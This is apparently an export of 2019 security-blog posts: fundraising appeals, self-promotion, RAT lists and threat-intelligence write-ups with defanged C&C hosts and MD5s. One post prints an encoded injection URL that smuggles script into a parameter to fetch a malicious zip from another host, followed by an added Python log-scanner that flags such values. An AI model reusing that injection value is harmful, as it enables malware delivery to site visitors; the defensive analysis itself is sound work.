19. http://ddanchev.blogspot.com/2007/09/syrian-embassy-in-london-serving.html

20. http://ddanchev.blogspot.com/2007/10/cisrt-serving-malware.html

21. http://ddanchev.blogspot.com/2007/10/cisrt-serving-malware.html

22. https://ddanchev.blogspot.com/2007/09/us-consulate-st-petersburg-serving.html

23. https://ddanchev.blogspot.com/2008/01/massive-realplayer-exploit-embedded.html

24. https://ddanchev.blogspot.com/2008/01/massive-realplayer-exploit-embedded.html

25. https://ddanchev.blogspot.com/2007/12/mdac-activex-code-execution-exploit.html

26. https://ddanchev.blogspot.com/2007/12/mdac-activex-code-execution-exploit.html

27. https://ddanchev.blogspot.com/2008/03/embedding-malicious-iframes-through.html

28. https://ddanchev.blogspot.com/2008/03/embedding-malicious-iframes-through.html

29. https://ddanchev.blogspot.com/2007/11/detecting-and-blocking-russian-business.html

30. https://ddanchev.blogspot.com/2007/11/detecting-and-blocking-russian-business.html

31. https://ddanchev.blogspot.com/2007/11/detecting-and-blocking-russian-business.html

32. https://ddanchev.blogspot.com/2008/03/injecting-iframes-by-abusing-input.html

33. https://ddanchev.blogspot.com/2008/01/rbn-fake-account-suspended-notices.html

34. https://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html

35. https://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html

36. https://ddanchev.blogspot.com/2008/04/hacked-by-rbn.html

37. https://ddanchev.blogspot.com/2008/03/rogue-rbn-software-pushed-through.html

38. https://ddanchev.blogspot.com/2008/03/wiredcom-and-historycom-getting-rbn-ed.html

39. https://ddanchev.blogspot.com/2008/03/wiredcom-and-historycom-getting-rbn-ed.html

40. https://ddanchev.blogspot.com/2007/11/exposing-russian-business-network.html

41. https://ddanchev.blogspot.com/2007/11/exposing-russian-business-network.html

42. https://ddanchev.blogspot.com/2008/03/embedded-malware-at-bloggies-awards-site.html

43. https://ddanchev.blogspot.com/2008/03/embedded-malware-at-bloggies-awards-site.html

44. https://ddanchev.blogspot.com/2008/02/geolocating-malicious-isps.html

45. https://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html

46. https://ddanchev.blogspot.com/2008/03/the-new-media-malware-gang-part-four.html

47. https://ddanchev.blogspot.com/2007/11/another-massive-embedded-malware-attack.html
Join Me on Patreon Community! (2019-09-09 18:07)

Dear blog readers,

I decided to let everyone know that I’ve recently launched my own [1]Patreon Community Page with the idea to let everyone know that I’m currently busy crowd-funding a high-profile upcoming Cyber Security Investment Project - and I would love to hear from you more details about your thoughts regarding new Tier Features and whether or not you could make a possible long-term type of financial donation or sponsorship regarding my research and my security expertise.

The current status of the project:

- I’m currently busy soliciting additional input from colleagues regarding upcoming Tier Features

- I’m currently busy reaching out to colleagues to possibly convert them to Patreon Sponsors

- I’m currently busy working on a high-profile Security Podcast

- I’m currently busy working on a high-profile Security Newsletter

Has my research helped you or your organization in the past? Have you been a long-time blog reader? Have you learned something new? Did my active cybercrime and nation-state actor profiling help you excel in your career path? Are you happy with what you’re seeing? Dare to take a moment and refer a colleague or an organization my personal blog including my [2]Patreon Community Page including a possible Patreon Sponsor request confirmation?

Looking forward to hearing from you at - dancho.danchev@hush.com

Enjoy!

1. https://www.patreon.com/bePatron?u=15880233

2. https://www.patreon.com/ddanchev123
Fake NordVPN Web Site Drops Banking Malware Spotted in the Wild (2019-09-11 16:53)

I’ve recently come across a rogue NordVPN web site distributing malicious software, potentially exposing NordVPN users to a multitude of malicious software and further compromising the confidentiality, availability and integrity of the targeted host.

In this post, I’ll provide actionable intelligence on the infrastructure behind the campaign and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it.

Sample malicious URL known to have participated in the campaign:

hxxp://nord-vpn.club - 192.64.119.159; 2.56.215.159

Sample malicious MD5s known to have participated in the campaign:

Historical OSINT - Georgian Justice Department and Georgia Ministry of Defense Compromised Serving Malware Courtesy of the Kneber Botnet (2019-09-11 19:07)

It’s 2010 and I’ve recently come across a compromised Georgian Government Ministry of Defense and Ministry of Justice official Web site potentially participating in a widespread phishing and malware-serving campaign enticing users into interacting with rogue U.S Intelligence and U.S Law Enforcement themed emails for the purpose of spreading and dropping malicious software on the targeted host’s PC.

Sample malicious URL known to have participated in the campaign abusing common Web Site redirection application vulnerability flaw:

hxxp://www.mod.gov.ge/2007/video/movie.php?l=G&v=%20%3E%20a%20href%20http%3A%2F%2Fofficialweightlosshelp.org%2Fwp-admin%2Freport.zip%20%3EDownload%20%3C%2Fa%3E%20script%3Ewindow.OPEN%20http%3A%2F%2Fofficialweightlosshelp.org%2Fwp-admin%2Freport.zip%20%3C%2Fscript%3E%20#05184916461921807121
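Once percent-decoded, the v parameter in the sample URL above holds markup and a download link pointing at a different host. The following Python log check is an added example, not code from the original post: it decodes every query parameter (including double-encoded values) and flags markup or off-site URLs. The log layout (virtual host first, then combined format), the host names and the log lines are constructed assumptions; only the path and the l/v parameter names follow the sample URL.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumed layout: vhost client - - [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Tag openers/closers, a bare "script>" and window.open do not belong in a parameter.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*|\bscript\s*>|window\.open", re.I)
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)

# Constructed log lines. Hosts are placeholders; the path and the l/v parameter
# names follow the sample URL in the post.
SAMPLE_LOG = [
    'www.gov.example 198.51.100.7 - - [11/Sep/2019:10:00:01 +0000] '
    '"GET /2007/video/movie.php?l=G&v=42 HTTP/1.1" 200 5120',
    'www.gov.example 203.0.113.50 - - [11/Sep/2019:10:00:02 +0000] '
    '"GET /2007/video/movie.php?l=G&v=%20%3E%20a%20href%20http%3A%2F%2Ffiles.example.net'
    '%2Fwp-admin%2Freport.zip%20%3EDownload%20%3C%2Fa%3E%20script%3Ewindow.OPEN%20'
    'http%3A%2F%2Ffiles.example.net%2Fwp-admin%2Freport.zip%20%3C%2Fscript%3E%20 HTTP/1.1" 200 5310',
    'www.gov.example 203.0.113.51 - - [11/Sep/2019:10:00:03 +0000] '
    '"GET /search?q=%253Ciframe%2520src%253Dhttp%253A%252F%252Fcdn.example.org%252Fx%253E '
    'HTTP/1.1" 200 2048',
    'www.gov.example 198.51.100.9 - - [11/Sep/2019:10:00:04 +0000] '
    '"GET /login?next=http%3A%2F%2Fwww.gov.example%2Fhome HTTP/1.1" 302 0',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_same_site(url_host, vhost):
    """True when url_host is the served site itself or one of its subdomains."""
    url_host, vhost = url_host.lower().rstrip("."), vhost.lower()
    base = vhost[4:] if vhost.startswith("www.") else vhost
    return url_host == base or url_host.endswith("." + base)


def inspect_target(vhost, target):
    """Return [(param, [reasons])] for parameters carrying markup or off-site URLs."""
    findings = []
    # parse_qsl removes one layer of percent-encoding; fully_decode removes the rest.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(value)
        reasons = []
        if MARKUP_RE.search(value):
            reasons.append("markup")
        for host in sorted({h.lower() for h in URL_RE.findall(value)}):
            if not is_same_site(host, vhost):
                reasons.append("external-url:" + host)
        if reasons:
            findings.append((name, reasons))
    return findings


def scan(lines):
    """Return (client, path, findings) for every log line with a suspicious parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed layout; skip rather than guess
        findings = inspect_target(m["vhost"], m["target"])
        if findings:
            hits.append((m["client"], urlsplit(m["target"]).path, findings))
    return hits


if __name__ == "__main__":
    for client, path, findings in scan(SAMPLE_LOG):
        print(client, path, findings)
```

A hit is a lead for review rather than a verdict: applications that legitimately pass off-site URLs in parameters need an allow-list in front of this check.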
Related malicious URLs known to have participated in the campaign:

hxxp://officialweightlosshelp.org/wp-admin/report.zip

Spread URL found within the config:

hxxp://www.adventure-center.net/upload/x.txt - 195.70.48.67

Related compromised malicious URLs known to have participated in the campaign:

hxxp://new.justice.gov.ge/files/Headers/in.txt

hxxp://new.justice.gov.ge/files/Headers/fresh.txt

hxxp://new.justice.gov.ge/files/Headers/rollers1.php

Related MD5s known to have participated in the campaign:


Known to have participated in the campaign are also the following two domains part of the Hilary Kneber botnet:

hxxp://dnicenter.com - Email: abuseemaildhcp@gmail.com

hxxp://dhsorg.org - Email: hilarykneber@yahoo.com

Related malicious download location URLs known to have participated in the campaign:


Related malicious and fraudulent domains known to have participated in the campaign:

hxxp://dhsinfo.info - 218.240.28.34

hxxp://greylogic.info - 218.240.28.34; 218.240.28.4

hxxp://intelfusion.info - 218.240.28.34
hxxp://greylogic.org - 222.122.60.1

Related malicious MD5s known to have participated in the campaign:

MD5: 8b3a3c4386e4d59c6665762f53e6ec8e

MD5: 5fb94eef8bd57fe8e20ccc56e33570c5

MD5: 28c4648f05f46a3ec37d664cee0d84a8

Once executed, a sample malware phones back to the following C&C server IPs:

hxxp://from-us-with-love.info - 91.216.141.171

hxxp://from-us-with-love.info/imglov/zmpt4d/n16v18.bin

hxxp://vittles.mobi - 174.132.255.10

hxxp://nicupdate.com - 85.31.97.194

Related malicious and fraudulent IPs known to have participated in the Hilary Kneber botnet campaign:


Related malicious and fraudulent domains known to have participated in the Hilary Kneber botnet campaign:


Related Hilary Kneber botnet posts:

[1]Keeping Money Mule Recruiters on a Short Leash

[2]Standardizing the Money Mule Recruitment Process

[3]Dissecting the Exploits/Scareware Serving Twitter Spam Campaign

[4]Koobface Botnet Starts Serving Client-Side Exploits

1. https://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html

2. https://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

3. https://ddanchev.blogspot.com/2010/06/dissecting-exploitsscareware-serving.html

4. https://ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.html
I’m Back! (2019-09-17 09:56)

Dear blog readers - it’s been a while since I’ve last posted a quality update following my [1]disappearance and possible kidnapping attempt circa 2010 but as many of you have noticed I’ve recently published a variety of research and CYBERINT type of articles in a variety of areas which means that I’ll be shortly returning to the usual blogging rhythm successfully publishing a quality set of research articles anytime soon. I’ve also wanted to let you know that I’ve recently launched an extremely popular News Portal called [2]Unit-123 offering practical advice to the U.S Intelligence Community including Cyber Warriors and Cyber Warfare experts including a Cyber Security and Hacking Community called [3]Offensive Warfare including a Bitcoin soliciting bid on the Dark Web for the upcoming launch of a proprietary custom-based Virtual Reality Social Network for Hackers and Security Experts called [4]Cybertronics (dzxvmqrl3rjxbzuer6vv5ejahniz2nefqxfmwspfmvzjo4x xzm7n4xad.onion) including the usual interview spree in an attempt to land a permanent job position as I’ve been working on a variety of personal and proprietary Security and OSINT projects.

• Are you interested in having me speak at your event? Are you interested in inviting me to join a classified and potentially sensitive event or research group? Are you interested in becoming a writer at this blog? Are you interested in advertising at this blog? Feel free to approach me - disruptive.individuals@gmail.com

Consider going through some of my most recently published research:

• [5]Exposing Iran’s Most Wanted Cybercriminals - FBI Most Wanted Checklist - OSINT Analysis

• [6]Exposing Yet Another Currently Active Fraudulent and Malicious Pro-Hamas Online Infastructure

• [7]Flashpoint Intel Official Web Site Serving Malware - An Analysis

• [8]Historical OSINT - "I Know Who DDoS-ed Georgia and Bobbear.co.uk Last Summer"

• [9]Historical OSINT - A Peek Inside The Georgia Government’s Web Site Compromise Malware Serving Campaign - 2010

• [10]Historical OSINT - Profiling a Rogue and Malicious Domain Portfolio of OEM-Pirated Software

• [11]Historical OSINT - Able Express Courier Service Re-Shipping Mule Recruitment Scam Spotted in the Wild

• [12]Historical OSINT - Global Postal Express Re-Shipping Mule Recruitment Scam Spotted in the Wild

• [13]Historical OSINT - Re-Shipping Money Mule Recruitment "Your Shipping Panel LLC" Scam Domain Portfolio Spotted in the Wild

• [14]The Threat Intelligence Market Segment - A Complete Mockery and IP Theft Compromise - An Open Letter to the U.S Intelligence Community

• [15]Historical OSINT - A Portfolio of Fake Tech Support Scam Domains - An Analysis

• [16]Historical OSINT - Georgian Justice Department and Georgia Ministry of Defense Compromised Serving Malware Courtesy of the Kneber Botnet

• [17]Historical OSINT - The Russian Business Network Says "Hi"

• [18]Profiling "Innovative Marketing" - The Flagship Malvertising and Scareware Distributor - Circa 2008 - An OSINT Analysis

• [19]Exposing Evgeniy Mikhaylovich Bogachev and the "Jabber ZeuS" Gang - An OSINT Analysis

• [20]Profiling a Currently Active Portfolio of High-Profile Cybercriminal Jabber and XMPP Accounts

In this post I’ll walk you through the story of my disappearance including a brief introduction and explanation of my "hacker enthusiast" years circa the 90’s where I’ve been busy doing "lawful surveillance" and "lawful interception" throughout my teenage years while I was not busy working full-time with several H/C/P/A (Hacking/Cracking/Phreaking/Anarchy) groups as a full-time member practically setting up the foundations of the Threat Intelligence market segment a few years later including the basics of Technical Collection type of position including Independent Contractor working under NDA in a post 9/11 World including a personal greeting to everyone who’s been approaching me and reaching out offering support and technical and operational "know-how" including general "say hi" advice.

I want to express a personal gratitude to a good old research friend - [21]Internet Anthropologist - who actually [22]initiated a track-down action and managed to indirectly find me circa 2010 with the help of international and Bulgarian law-enforcement including fellow colleagues and friends from the Security Industry and U.S Intelligence Community circa 2008-2013 who attempted to track me down and find out more about my disappearance.

In this post I’ll discuss my visit to the GCHQ circa 2008 with the Honeynet Project including an in-depth discussion on my "lawful interception" and "lawful surveillance" experience circa the 90’s throughout my teenage hacker years including an in-depth discussion on the hacking Scene that I was proud to be a member of throughout the 90’s having successfully participated in a variety of community and commercial projects including a personal thanks to the following friends and colleagues for offering support and keeping track of my research:

• [23]Jamie Riden for making a personal contribution to my PayPal account for research purposes

• [24]Steve Santorelli from Team Cymru for expressing interest in a proprietary Threats Database

• [25]Michal Salat for participating in a brief trial of my Threat Data service

• [26]Ian Cook for making a personal introduction to my current part-time employer [27]KCS Group Europe

• [28]Jeffrey Bardin from Treadstone71 who reached out and offered employment opportunity

• [29]Harrison Cook who’s been persistently donating and reaching out to support the Offensive Warfare 2.0 community

• [30]John Young from Cryptome.org who helped spread the word about the Offensive Warfare 2.0 Community

• [31]Liran Sorani from Webhose for the opportunity to participate in a part-time project
An In-depth Analysis of the Hacking Scene circa the 90’s through the prism of Dancho Danchev also known as tHe mAnIaC:

In a World where we’ve successfully set the foundation of offensive clandestine and psychological operations including the foundations of Technical Collection and the foundations of the [32]Threat Intelligence market segment including the persistent emphasis on cyber threats facing U.S Government and U.S National Infrastructure in the context of enriching and disseminating actionable Threat Intelligence on a variety of U.S Intelligence Community including academic partners throughout the past decade successfully leading me to participate in a Top Secret GCHQ Surveillance and Monitoring Program basically keeping track of hackers and security researchers on Twitter for proactive Cyber Defense and OSINT purposes called "[33]Lovely Horse" including a possible "4th Party Collection" trend-setting initiative circa 2008-2013 labeling some of my research as a possible "4th Party Collection" partner of U.S Intelligence Community including the [34]tracking and take down of the Koobface botnet including my experience as a Managing Director of "The Underground" also known as [35]Astalavista Security Group’s Astalavista.com ([36]Security Interviews - Part 01; [37]Security Interviews - Part 02; [38]Security Interviews - Part 03) throughout 2003-2006 with my ex-girlfriend now partner in life - Yordanka Ilieva - when we used to rock the boat - and are prone to do so. Takes you back doesn’t it? Keep reading.

Personal Photo of bedroom hacker - today’s leading expert in the field of cybercrime research security blogging and threat intelligence gathering - Dancho Danchev also known as tHe mAnIaC circa the 90’s with his hacker girlfriend - Yordanka Ilieva - including various personal projects circa the 90’s
• I happen to have directly established a connection with one of the primary Sub7 Trojan Horse authors HeLLfiReZ which makes me pretty close to [39]Steve Gibson in one way or another - throughout the 90’s where we exchanged Trojan Horse samples while I was busy working for Trojan Defense Suite and the infamous Lockdown2000 anti-trojan software suite where I was busy working on signatures and help-guides compilation while I was also busy being a member of several hacking groups primarily found on the Cyberarmy.com Top 50 Hacking List including Progenic.com Top 100 hacking sites list.

• Mail-bombing was a trend - in particular my personal experience of making jokes with friends who were unable to take care of 100+ email messages in their Inbox

• Mass-Mailing List subscription - in particular the fact that my friends were not capable of finding a productive way to get rid of the messages and unsubscribe themselves

• Telephony Denial of Service attack circa the 90’s exploiting a popular for Eastern Europe Mail2SMS mobile provider feature - in particular the fact that it’s not necessarily a pleasant experience to get rid of 100+ SMS messages received in a short-period of time

• "Lawful Interception" of friends - something else that I’m not particularly proud of is my "lawful surveillance" and "lawful interception" experience and capabilities of people that I knew and that I used to know largely driven by the need to explore and learn more

• Corporate Experience in the field of anti-trojan detection technologies and categorization - in particular my experience in creating trojan horse signatures and writing actual technical descriptions for the purpose of improving my employer’s overall detection rate for a variety of trojan horse vendors circa the 90’s.

Do you remember my work from the 90’s? Are you familiar with the Scene circa the 90’s? Feel free to approach me - disruptive.individuals@gmail.com or make a PayPal donation using my PayPal ID: dancho.danchev@hush.com for the purpose of fueling growth into my research.
Massive Portfolio of APT (Advanced Persistent Threat) and RAT (Remote Access Tools) Domains Spotted in the Wild - An Analysis (2019-09-20 17:17)

In a world dominated by thousands of currently active APT (Advanced Persistent Threat) campaigns also known as Remote Access Tools (RATs) including trojan horses it’s worth pointing out that novice cybercriminals continue relying on and actively utilizing a variety of commercial and publicly obtainable DIY (do-it-yourself) Remote Access Tools (RATs) for the purpose of committing cyber espionage and launching malicious and fraudulent cyber espionage themed campaigns targeting thousands of users including companies and nation-state actors.

In this post I’ll provide actionable intelligence on some of the most popular RAT (Remote Access Tools) currently utilized for APT (Advanced Persistent Threat) type of nation-state sponsored and tolerated cyber espionage themed campaigns including an in-depth discussion on a massive domain portfolio of currently active C&C server IPs known to have participated in a variety of APT (Advanced Persistent Threat) type of cyber espionage campaigns throughout 2015-2019.

Among the most popular APT (Advanced Persistent Threat) and Remote Access Tools (RATs) releases based on my public and proprietary sensor network remain the following currently obtainable commercial and publicly obtainable tools:

• Casa RAT

• Bandook RAT

• Dark Comet Rat
• Cerberus

• Cybergate

• Blackshades

• Poison Ivy

• Schwarze Sonne RAT

• Syndrome RAT

• Team Viewer

• Y3k RAT

• Snoopy

• 5p00f3r.N$ RAT

• SpyNet

• P. Storrie RAT

• Turkojan Gold

• Bifrost

• Beast

• Shark

• Pain RAT

• xHacker Pro RAT

• Seed RAT

• Optix Pro RAT

• Dark Moon

• NetDevil

• Deeper RAT

• MiniMo RAT

• Alusinus RAT v0.8

• Babylon 1.6.0.0

• Bozok 1.4.3

• BX RAT v1.0

• Cloud Net RAT

• Comet RAT v0.1.4

• Coringa-RAT v0.1
• Crimson 3.0.0

• Crimson RAT 2.2.6

• ctOs 1.3.0.0

• CyberGate v1.01.12

• Dark Comet 5.3

• DarkComet Legacy

• DH Rat 0.3

• D-RAT

• Frutas RAT v0.9

• Greame RAT v1.9

• HAKOPS RAT v2

• Imminent Monitor 3.9.0.0

• Imperium RAT Cracked

• jRat

• jSpy

• jSpy RAT v0.09

• KilerRat V 10.0.0

• L6-RAT Beta

• Maus 2.0b

• Mega RAT 1.5 Beta

• MLRAT

• MQ5 RAT

• NanoCore 1.2.2.0

• NingaliNET v1.1.0.0

• NjRAT 0.7

• njRAT v0.8d By Nasser2012

• njworm

• NovaLite v3.0

• Nuclear RAT 2.1.0

• Orion RAT 0.9 Free

• Pandora RAT V1.1
• Paradox RAT

• Proton 1.1.0.6

• pupy-master

• Poison Ivy

• Quasar 1.1 + Source

• QuasarRAT v1.3.0.0

• Rabbit-Hole Autoit RAT v1.0 Beta 2

• Revenge RAT v0.1

• SkyWyder 2.2

• Spycronic 1.02.1

• Spygate 2.6

• SpyGate-RAT 3.3

• SpyNet 0.7 Public

• Spy-Net v2.6

• Turkojan 4.0 Gold

• ucuL v1.1

• Vantom RAT

• Virus Rat v8.0 Beta

• Xena Rat 2.0

• xRAT 2.0

Related domains and IPs known to have participated in various APT (Advanced Persistent Threat) and Remote

Access Tools (RATs) type of malicious and fraudulent campaigns throughout 2015-2019:

Historical OSINT - Dancho Danchev’s Media and News Coverage - 2008-2013 (2019-09-20 17:25)

Dear blog readers I wanted to take the time and effort and summarize all the currently related news media articles

referencing me and my research throughout the period - 2008-2013 and wanted to express my gratitude to everyone

who approached me seeking my assistance in an upcoming news article including those who participated in the

search for me circa 2010 and I wanted to let everyone know that users interested in approaching me regarding

potential news stories including conference presentations and possible threat intel requests can approach me at

disruptive.individuals@gmail.com

Stay tuned!

Research and News Articles covering my research and referencing me throughout - 2008:

• [1]Russian hacker ’militia’ mobilizes to attack Georgia

• [2]Fraudsters Target Facebook With Phishing Scam

• [3]Fake Microsoft e-mail contains Trojan virus

• [4]Hackers expand massive IFRAME attack to prime sites

• [5]Hackers infiltrate Google searches

• [6]Hackers expand massive IFrame attack to prime sites

• [7]Hackers knocked Comcast.net offline

• [8]Adobe investigates Flash Player attacks

• [9]High-tech bank robbers phone it in

• [10]Attackers booby-trap searches at top Web sites

• [11]Carpet bombing networks in cyberspace

• [12]Storm worm e-mail says U.S. attacked Iran

• [13]India’s underground CAPTCHA-breaking economy

• [14]Domain Name Record Altered to Hack Comcast.net

• [15]Google searchers could end up with a new type of bug

• [16]Ongoing IFrame attack proving difficult to kill

• [17]Hackers expand massive IFRAME attack to prime sites

• [18]Danchev: The small pack Web malware exploitation kit

• [19]Danchev: Massive SQL injection the Chinese way

• [20]CAPTCHAs are dead - new research from Dancho Danchev confirms it

• [21]Hackers infiltrate Google searches

• [22]Massive faux-CNN spam blitz uses legit sites to deliver fake Flash

• [23]Faked CNN spam blitz pushes fake Flash

• [24]Danchev: Anti-fraud site DDOS attack

• [25]Sony PlayStation site victim of SQL-injection attack

• [26]Fake CNN Alert Still Spreading Malware

• [27]Look Ma, I’m on CIA.gov

Research and News Articles covering my research and referencing me throughout - 2009:

• [28]Green Dam exploit in the wild

• [29]“In gaz we trust”: a fake Russian energy company facilitating cybercrime

• [30]Don’t pay your ransom via SMS

• [31]NYT scareware scam linked to click fraud botnet

• [32]Danchev: A crimeware developer’s to-do list

• [33]Danchev rained on my scareware campaign

• [34]Is “aggregate-and-forget” the future of cyber-extortion?

• [35]NYT scareware scam linked to click fraud botnet

• [36]Microsoft declares war on ’scareware’

• [37]Don’t pay your ransom via SMS

• [38]Twitter warms up malware filter

• [39]What’s really the safest Web Browser?

• [40]With Unrest in Iran, Cyber-attacks Begin

• [41]Zeus bot found using Amazon’s EC2 as C&C server

Research and News Articles covering my research and referencing me throughout - 2010:

• [42]Firefox add-on encrypts sessions with Facebook, Twitter

• [43]Watch out for malware with those pretty Mac screensavers

• [44]Months-old Skype vulnerability exploited in the wild

• [45]Danchev: Money mule recruiters

• [46]Cybercrime’s bulletproof hosting exposed

• [47]Malware Threatens to Sue BitTorrent Downloaders

• [48]Firefox add-on encrypts sessions with Facebook, Twitter

• [49]Chuck Norris Botnet Karate-chops Routers Hard

Research and News Articles covering my research and referencing me throughout - 2011:

• [50]Kaspersky disputes McAfee’s Shady Rat report

• [51]Has EV-SSL Growth Been Slow?

• [52]Report: Vishing Attack Targets Skype Users

Research and News Articles covering my research and referencing me throughout - 2012:

• [53]Fake UPS notices deliver malware

• [54]ZeuS/Zbot Trojan Spread Through Rogue US Airways Email

• [55]New Skype malware threat reported: Poison Ivy

• [56]Five Koobface botnet suspects named by New York Times

• [57]Virtual jihad: How real is the threat?

• [58]Is the death knell sounding for traditional antivirus?

• [59]Can the Nuclear exploit kit dethrone Blackhole?

• [60]Experts split over regulation for bounty-hunting bug sniffers

• [61]Spammers Using Fake YouTube Notifications to Peddle Drugs

• [62]Adele Bests Adderall As Affiliate Spammers Offer Music Downloads

• [63]Bulgarian sleuth unveils botnet operators

• [64]Fake PayPal Emails Distributing Malware

• [65]Web Gang Operating in the Open

• [66]ZeuS/Zbot Trojan Spread Through Rogue US Airways Email

• [67]Buy 500 hacked Twitter accounts for less than a pint

• [68]NBC.com Hacked, Infected With Citadel Trojan

Research and News Articles covering my research and referencing me throughout - 2013:

• [69]How Much Does A Botnet Cost?

• [70]Automated YouTube account generator offered to cyber crooks

• [71]Upgraded Modular Malware Platform Released in Black Market

• [72]Deconstructing the Al-Qassam Cyber Fighters Assault on US Banks

• [73]NBC hack infects visitors in ’drive by’ cyberattack

• [74]Bitcoins are being traded for hack tools

• [75]New DIY Google Dorks Based Hacking Tool Released

• [76]Hacking The TDoS Attack

• [77]Mass website hacking tool alerts to dangers of Google dorks

• [78]Cybercrime service automates creation of fake scanned IDs

• [79]Spammers unleash DIY phone number slurping web tool

• [80]Spam email contains malware, not Apple gift card

• [81]APT1, that scary cyber-Cold War gang: Not even China’s best

• [82]Mass website hacking tool alerts to dangers of Google dorks

• [83]C&C PHP script for staging DDoS attacks sold on underground forums

• [84]Russian Malware-as-a-Service Offers Up Server Rentals for $240 a Pop

• [85]Java exploit kit sells for $40 per day

• [86]Buggy DIY botnet tool leaks in black market

• [87]New DIY Google Dorks Based Hacking Tool Released

• [88]Botnets for rent, criminal services sold in the underground market

• [89]Spam email contains malware, not Apple gift card

Announcing Law Enforcement and OSINT Intelligence Operation "Uncle George" - Join Me Today! (2019-10-16 20:16)

Dear blog readers,

Surprise, surprise! I wanted to let everyone know that I’ve spent a decent portion of my time crawling and

actually harvesting and data mining 78 high-profile public Cybercrime Forum Communities basically consisting of

1M raw OSINT data Web site pages harvested and ready for processing and enrichment. Dare to join the campaign?

Keep reading and drop me a line at ddanchev@cryptogroup.net to coordinate and discuss including details on how

to obtain free access to the 2019 Cybercrime Forum Community Data Set which is basically 18GB comprising of 1M

crawled and harvested Web sites from the most popular Public Cybercrime Forum Communities.

Timeline of the Project including What You Need to Participate with the Ultimate Goal to Track Down the

Individuals Behind These Communities and Actually Take Them Down:

• Drop me a line at ddanchev@cryptogroup.net and let me know that you’ve downloaded it and that you’re currently interested in participating in the project

• Please coordinate with me what you plan to do with the archive in terms of possible raw OSINT enrichment and automated Social Network Analysis including sharing it with your Law Enforcement contacts or colleagues in your organization at dancho.danchev@hush.com

• Grab a copy of Open Desktop Semantic Search - https://www.opensemanticsearch.org and process the archive

• Grab a copy of Solr-Powered Local YaCy Search Engine - https://yacy.net and process the archive

• Grab a copy of Carrot2 – Open Source Search Results Clustering Engine - https://project.carrot2.org/ and connect it with Solr-Powered Local YaCy Search Engine and start processing the results and share the results with me at dancho.danchev@hush.com

• Grab a copy of the following Statistical graphs generating tool - https://github.com/ko-ichi-h/khcoder and begin working on the archive

The Objectives List:

• Gather as much evidence for participation in fraudulent activity and shut down the community

• Collect as much personal information as possible including IoCs (Indicators of Compromise) Web site URLs including personal IM accounts and personal email addresses

• Publicly publish the results of the crowd-sourced raw OSINT enrichment project campaign and ask everyone to reach out to their contacts in U.S. Intelligence Community and international Law Enforcement to share the data and actively participate in the actual prosecution of the individuals behind these Cybercrime Forum Communities and the actual take-down process

• Share the data-set with as many academic Security Industry U.S. Intelligence and international Law Enforcement contacts as possible

Drop me a line at ddanchev@cryptogroup.net and let’s get the campaign going!

The results? Check out the following enriched raw OSINT graph which I managed to create for research purposes and to motivate you to participate.

Related Graphs Produced To Motivate You to Participate on a Per Keyword Basis:

Sample Screenshot of the ShadowCrew Cybercrime Forum Community circa 2002-2004:


Sample Public Member Email addresses of ShadowCrew Cybercrime Forum Community circa 2002-2004:


Sample Public ICQ UIN Numbers of ShadowCrew Cybercrime Forum Community circa 2002-2004:


Sample Public IM User Names of ShadowCrew Cybercrime Forum Community circa 2002-2004:


Let’s show them how it’s done! Send a message to ddanchev@cryptogroup.net to coordinate and discuss! Stay tuned!

1. https://1.bp.blogspot.com/-izGFehF5J9A/XabtzV0k-1I/AAAAAAAAJgk/p6-b3q4oH-Qwcg7K4TTK6Iuu-Oc9XiFHACLcBGAsYHQ/s1600/Western_Union_ShadowCrew_Cybercrime_Forum.png

2.10 November

New Commercial Security Research OSINT Cybercrime Research and Threat Intelligence Gathering Services Portfolio Available On Demand! (2019-11-02 18:14)

Dear blog readers,

I wanted to let everyone know of a currently active commercial portfolio of services that I’m publicly offering for the purpose of reaching out to colleagues and friends including companies, vendors and organizations who might be interested in working with me for the purpose of obtaining access to never-before-published Security Research analysis reports briefs podcasts and various other commercially obtainable virtual and cyber assets that you and your organization can take advantage of.

Approach me at - dancho.danchev@hush.com today to discuss!

Key Commercial Services that I’m currently offering include:

• [1]Security Services

• [2]OSINT Services

• [3]Hacking Services

• [4]Intelligence Services

• [5]Geopolitical Services

Including the following commercial services available on [6]Patreon Community:

• Real-Time Security Consultation

• Security Newsletter

• Cybercrime Blog Post

• Security Podcast

• Malware Analysis

• Threat Intelligence Analysis

• Security Workshop

• OSINT Analysis

• Geopolitical Analysis

• Threat Actor Profiling

• National Security Analysis

• Cyber Jihad Analysis

• Dark Web Intelligence and OSINT Analysis

• Security Presentation

• Cyber Security Business Development

• Red Team Penetration Testing Assessment

• Blue Team Penetration Testing Assessment

• Target of Opportunity Targeting

• Cybercrime Forum Monitoring

• Underground Chatter Monitoring

• Network Deception Consultation

• Military Scenario Building

• Cyber Warfare Scenario Building

• OSINT Enrichment and Data Mining

• Cyber Warfare Program Estimation

• Weapons System Analysis

• Cyber SIGINT and Cyber Assets Discovery

Stay tuned!

1. https://unit-123.org/security-services

2. https://unit-123.org/osint-services

3. https://unit-123.org/hacking-services

4. https://unit-123.org/intelligence-services

5. https://unit-123.org/geopolitical-services

6. https://www.patreon.com/ddanchev123

2.11 December

New Cybertronics - VR for Hackers and Security Experts Dark Web Onion Address (2019-12-02 10:15)

[1]

Dear blog readers,

I wanted to let everyone know that I’ve recently changed the official Dark Web Onion address for my Cybertronics -

VR for Hackers and Security Experts Project including the actual Bitcoin donation address.
